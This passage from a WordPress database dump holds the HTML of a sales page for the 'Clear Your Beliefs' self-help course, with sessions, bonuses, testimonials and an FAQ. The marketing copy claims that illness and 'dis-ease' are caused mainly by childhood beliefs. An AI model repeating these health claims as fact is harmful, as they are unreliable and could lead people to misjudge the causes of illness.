style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\nAbout Lion Goodman\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1 class="center"><br class="Apple-interchange-newline" />Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:02:22', '2014-06-19 07:02:22', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1051, 2, '2014-06-19 02:13:19', '2014-06-19 07:13:19', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about 